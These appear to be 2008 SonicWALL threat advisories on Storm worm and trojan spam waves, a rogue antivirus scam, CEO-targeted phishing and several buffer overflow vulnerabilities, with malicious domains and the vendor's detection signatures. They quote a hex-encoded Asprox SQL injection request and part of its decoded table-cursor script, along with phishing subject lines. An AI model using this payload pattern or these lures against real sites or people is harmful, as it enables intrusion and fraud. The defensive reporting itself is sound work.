Posts

BBC Georgia's President Trojan (Aug 15, 2008)

/in /by

Aug 15, 2008

Starting August 15, 2008, a new wave of malicious e-mails is being spammed with following subjects:

  • BBC NEWS.
  • Weekly BBC NEWS.
  • Your subscription.

The headlines in the email claim that Georgian president Mikheil Saakashvili is gay. Messages contain a linked image of the President from the BBC website:

Emails include links that are pointing to the following domains:

  • aguadodecea.com
  • elitezeitung.de
  • farmaciacardelus.com
  • freeweb.8k.ro
  • petstogoodhomes.com
  • thecar.fr
  • transporter.tv
  • vishalkullarwar.com
  • www.oris-uk.com
  • xrevolution.de
  • and others

All these locations redirect to a single IP (79.135.167.49).
The name of the malware is “name.avi.exe”.

SonicWALL detects this new wave with following signature:

GAV: FakeAlert.gen (Trojan)

Postcard Storm Wave (Aug 6, 2008)

/in /by

Aug 6, 2008

A new wave of e-mails was discovered with following subjects:

  • You Have An Ecard
  • A card for you
  • Someone sent you an Ecard.
  • Your Digital Greeting Card is waiting

They are pointing to the following domains:

  • bestlettercard.com
  • supergreetingcard.com
  • freepostcardonline.com
  • worldpostcardart.com
  • superlettercard.com
  • digitalaudiopostcard.com
  • audiopostcardmail.com
  • lettercardadvertising.com
  • yourlettercard.com
  • oldpostcardshop.com

Here are a few examples of such e-mails:

screenshot

The email contains a fake message claiming your neighbor or flatmate has sent you a greeting card along with a link. If the user clicks on the link , it opens up a page and prompts the user to download postcard.exe file which is the new variant of Storm worm.

screenshot

SonicWALL detects this new wave with following signatures:

GAV: Zhelatin.ZN_13 (Worm)

Cisco ActiveX Control Vulnerability (Aug 8, 2008)

/in /by

A flaw has been discovered in the Cisco Webex Meeting Manager ActiveX control. The flaw creates an exploitable vulnerability that may be leveraged by remote attackers.

The affected ActiveX control exposes one method called NewObject, which takes one single string argument. During the execution of this method, insufficient internal checks are performed on the argument value. The code does not correctly verify and enforce a length limit on the passed string value. The string is simply copied into a fixed size stack buffer regardless of its size. This lack of verification allows a long string to be passed to the affected function thereby overwriting internal memory structures which in turn may allow to divert process flow of the application.

SonicWALL has added a signature 3418 Webex Meeting Manager (atucfobj.dll) ActiveX Control BO Attempt that will detect and prevent generic attack attempts leveraging this vulnerability. Exploits attacking this vulnerability are known to exist.

SQL Injection Attack Wave (Aug 1, 2008)

/in /by

In the recent few weeks, a lot of SQL Injection attacks appeared on the Internet. These attacks use vulnerable ASP or PHP code to inject malicious SQL into the target database server. Furthermore, some SQL Injection Attack Tools have been developed and released on the Internet. The tools can query the Internet search engine such as Google, to find the ASP/PHP pages as the candidate targets. Then, the malicious SQL codes are injected into the target web pages. The attack may affect the database directly, or even the users who visit the infected pages. Danmec/Asprox SQL Injection Attack Tool is a good example.

The main method of these SQL Injections is to send the following HTTP request to the target:

GET /page.asp?id=xx;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00410052004500200040
00540020007600610072006300680061007200280032003500
350029002C0040004300200076006100720063006800610072
002800320035003500290020004400450043004C0041005200
4500200www.example.com HTTP/1.1

The contents within the CAST function are the hexadecimal value of the SQL sentences, and they may vary. One example of the malicious codes is listed below:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(‘UPDATE [‘+@T+’] SET

In response to these attacks, SonicWALL UTM team has created the following IPS signatures:

  • 1062 DECLARE CURSOR EXEC Attempt (Highly Possible SQL Injection)
  • 1092 CAST EXEC Attempt (Possible SQL Injection)
  • 1445 DECLARE CAST EXEC Attempt (Highly Possible SQL Injection)
  • 1074 DECLARE CAST EXEC Attempt 2 (Highly Possible SQL Injection)
  • 1079 DECLARE CAST EXEC Attempt 3 (Highly Possible SQL Injection)
  • 1080 DECLARE CAST EXEC Attempt 4 (Highly Possible SQL Injection)
  • 1111 DECLARE CAST DECLARE Attempt 1 (Possible SQL Injection)
  • 1112 DECLARE CAST DECLARE Attempt 2 (Possible SQL Injection)
  • 1113 DECLARE CAST DECLARE Attempt 3 (Possible SQL Injection)
  • 1114 DECLARE CAST DECLARE Attempt 4 (Possible SQL Injection)
  • 3336 SQL Inject Attack Attempt

These signatures will detect most of the attack cases described above. The following figure shows us the SQL Injection Attack activities within the last two months.

From the figure we can clearly find that these attacks began at the end of June, and they are still going. The SonicWALL UTM team will continue monitoring the attacks, and release up-to-date information about these SQL Injection Attacks.

New F.B.I. vs Facebook Storm Wave (July 31, 2008)

/in /by

July 31, 2008

Storm worm authors have changed their spam campaign which now involves fake news story about the FBI and Facebook. Starting July 29, 2008, a new wave of storm e-mails are being spammed with following subjects:

  • F.B.I. can watch our conversation through Facebook
  • FBI agents patrol Facebook
  • FBI may strike Facebook
  • FBI on the Hunt for Facebook users
  • F.B.I. bypasses Facebook to nail you
  • F.B.I. Looks Into Facebook
  • F.B.I. are spying on your Facebook profiles
  • F.B.I. busts alleged Facebook
  • Get Facebooks F.B.I. Files
  • Facebooks F.B.I. ties
  • F.B.I. watching you
  • The FBIs plan to profile Facebook
  • The FBI has a new way of tracking Facebook

In this new wave, they are using IP Addresses or a domain in the URL spammed via e-mail. Here are a few examples of such e-mails:

screenshot

The user will see the following page when he or she clicks on the link in the e-mail:

screenshot

The email contains a fake message related to the FBI and facebook. If the user clicks on the link on the page, it will prompt to download fbi_facebook.exe file which is the new variant of Storm worm.

screenshot

It also drops the following files on the system: 

 C:WINDOWSglok+serv.config C:WINDOWSglok+59e6-7783.sys

It also creates a new service for the glok+59e6-7783.sys and runs it.

SonicWALL detects this new wave with following signatures:

GAV: Zhelatin.ZI (Worm) – Released on July 23, 2008
GAV: Zhelatin.ZM (Worm) – Released on July 29, 2008
GAV: Zhelatin.ZM_2 (Worm) – Released on July 30, 2008

screenshot

New Amero Storm Wave (July 22, 2008)

/in /by

July 22, 2008

New spammed wave of Storm emails was discovered on July 21, 2008. Storm worm authors have changed their social engineering theme in this new wave and the e-mail arrives with following subjects:

  • Amero – the secret currency
  • Amero arrives
  • Amero currency Union is now the reality
  • Amero is not a myth
  • AMERO to replace Dollar
  • Bye bye dollar, hello amero
  • Collapse of the Dollar
  • Death of the U.S. Dollar
  • Dollar is replacing by Amero
  • Dollar is replacing by new currency
  • Fall of the Dollar, beginning of AMERO
  • No dollars anymore
  • North American Union is the reality now
  • One Currency for Canada, U.S and Mexico – The Amero
  • Say Goodbye to the Dollar
  • The Amero is here
  • The Dollar disappeared
  • The new currency is coming
  • Welcome the Amero
  • You can forget about Dollars

They have also reverted back to their old format of using IP addresses instead of fast-flux domains in the URL spammed via e-mail. The spammed e-mail looks like below:

screenshot

The user will see the following page when he or she clicks on the link in the e-mail:

screenshot

North American Currency Union does not exist and the new Storm social engineering campaign may be using it because of the recent economic slowdown. The webpage also contains a hidden iframe to a script named ind.php which contains drive-by exploits. SonicWALL blocks this script file with GAV: PackTibs.O (Trojan) signature. This signature has triggered 2,794 times since it was created on June 22, 2008.

If the user clicks on the icon on the page, it will prompt to download amero.exe file which is the new variant of Storm worm.

screenshot

It also drops the following files on the system: 

 C:WINDOWSglok+serv.config C:WINDOWSglok+40bc-761f.sys

It also creates a new service for the glok+40bc-761f.sys and starts it.

SonicWALL detects this new variant with GAV: Zhelatin.ZI (Worm) signature.

screenshot

Java Web Start Vulnerability (July 25, 2008)

/in /by

July 25, 2008

Java Web Start is a framework developed by Sun Microsystems. Unlike Java applets, Web Start applications do not run inside the browser, which allows an application to implement richer functionality while still preserving sandbox-level security. Java Network Launching Protocol (JNLP) is an XML-based protocol that specifies how Java Web Start applications are launched.

There exists a stack based buffer overflow vulnerability in Sun Java Web Start. The vulnerability, which has been assigned CVE-2008-3111, is due to improper handling of attributes of the j2se element within a JNLP file. More specifically, the vulnerable code copies the values of “initial-heap-size” and “max-heap-size” using a sprintf() function without validating the size of those values. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted JNLP file, potentially causing arbitrary code to be injected and executed in the context of the current user.

SonicWALL has developed 2 IPS signatures for this vulnerability:

  • 5120 Java Web Start JNLP File initial-heap-size BO Attempt
  • 5121 Java Web Start JNLP File max-heap-size BO Attempt

These signatures detect and prevent malicious JNLP files from reaching the internal network.

Fake anti-spyware Antivirus 2009 (July 18, 2008)

/in /by

July 18, 2008

A public beta of Norton Antivirus 2009 opened this week and the scammers didn’t wait long to follow suit with a new bogus scanner: Antivirus 2009.

Antivirus 2009, also known as Antivirus2009, is a rogue anti-spyware program that uses false spyware results to lure you to purchase its full version. Antivirus2009 is an updated version of Antivirus 2008.

Antivirus 2009 is usually promoted via a ZLOB/MediaAccess Codec installer found on adult websites. Zlob has been the trojan of choice to infect users with pop ups disguised as system notifications that lead to websites with rogue anti-spyware programs. You can also install Antivirus 2009 manually on the rogue websites:

More related URLs:

  • Antivirus-2009.com
  • antivirus-scanner.com
  • antivirus2009professional.com
  • antispyware2008purchase.com
  • virusremover2008.com
  • antivirus2009-freescan.com
  • antivirus2009-scanner.com
  • totalantivirusonline.com
  • virus9-webscanner.com
  • windows-scanner.com
  • virus9-webscanner.com
  • xponlinescanner9.com
  • freewebscanner.com

screenshot

We recomend blocking the above domains by editing your local hosts file to redirect them to 127.0.0.1

When clicking on SCAN or CHECK YOUR PC, a “AV2009Install_0011.exe” file is pushed on to your system. It’s usually run-time compressed with UPX or PolyCrypt packer. We have received at least 140 different variants of this threat.

When run it issues a GET HTTP request as follows: 

 GET /download/av2009b.exe HTTP/1.1              Host: antivirus-2009.com

screenshot

Then the fake antimalware product is installed and starts giving fake results and making the system unusable until a full version is purchased.

screenshot

screenshot

screenshot

SonicWALL is blocking this threat with GAV: XPAntivirus_12 (Adware) and GAV: Fakealert.TY (Trojan) signatures.

Adobe PDF Javascript Vulnerability (July 18, 2008)

/in /by

July 18, 2008

The vulnerability is created by a lack of proper boundary checks when processing arguments supplied to several JavaScript functions. Given a large string argument to a vulnerable function it is possible to write arbitrary code past the alloted stack buffer. This results in corruption of local stack variables as well as the return address of the calling function. In effect, exploitation can allow for process diversion to arbitrary code. As the vulnerable application is running within the logged in user security context, the exploitation will be limited to the same. The vulnerability has been assigned CVE-2007-5659.

The method used to store JavaScript in PDF files presents a number of difficulties in terms of detection of malicious files. Firstly, in order to detect a malicious file, the JavaScript code needs to be interpreted to determine its intent. This step requires a JavaScript interpreting engine. Secondly, the JavaScript itself is compressed within the PDF file. Thus, in order to be able to analyze the code, it first has to be decompressed. Lastly, the compressed stream has to be found within the PDF file as it is usually a separate object referred to by an index defined in a previous JavaScript object defenition.

Sonicwall has developed a series of GAV signatures to detect and prevent malicious PDF files from being transfered. These signatures will detect exploits which have been found to be actively used in exploitation attempts in the wild. The signatures detect malicious JavaScript code in its compressed form. There are currently fourteen exploits known to have been used to target this vulnerability. All known exploits are covered by Sonicwall. The following signatures cover this vulnerability:

  • PDF.JavaScript.L
  • PDF.JavaScript.K
  • PDF.JavaScript.J
  • PDF.JavaScript.I
  • PDF.JavaScript.H
  • PDF.JavaScript.G
  • PDF.JavaScript.F
  • PDF.JavaScript.E
  • PDF.JavaScript.D
  • PDF.JavaScript.C
  • PDF.JavaScript.B_2
  • PDF.JavaScript.A
  • PDF.JavaScript.CI.B
  • PDF.JavaScript.CI.A

CEO subpoena phishing attacks (April 16, 2008)

/in /by

On April 14, 2008 hundreds of CEOs received an official looking subpoena via email requesting to appear in San Diego in front of a grand jury. This was a targeted attack known as “whaling”. The emails were only sent to CEOs and they looked legitimate, including personalized name, phone number, and company for each recipient.

The email contained a link to http://CACD-USCOURTS.COM to view the details of the “subpoena”. This domain was registered by an individual in UK 2 days prior to the attack and the web server was hosted in China. The link actually went to a Trojan file, which pretended to be Adobe Acrobat PDF Reader ActiveX Control. Here is a screenshot of the subpoena email.

SonicWALL released a GAV signature to protect against web downloads of malware exploiting the fake subpoena social engineering. The initial Trojan was first seen in the wild on April 14, 2008. Since April 15, 2008, users of SonicWALL’s Unified Threat Management technology have been protected against this threat with the GAV: Small.BSL (Trojan) signature.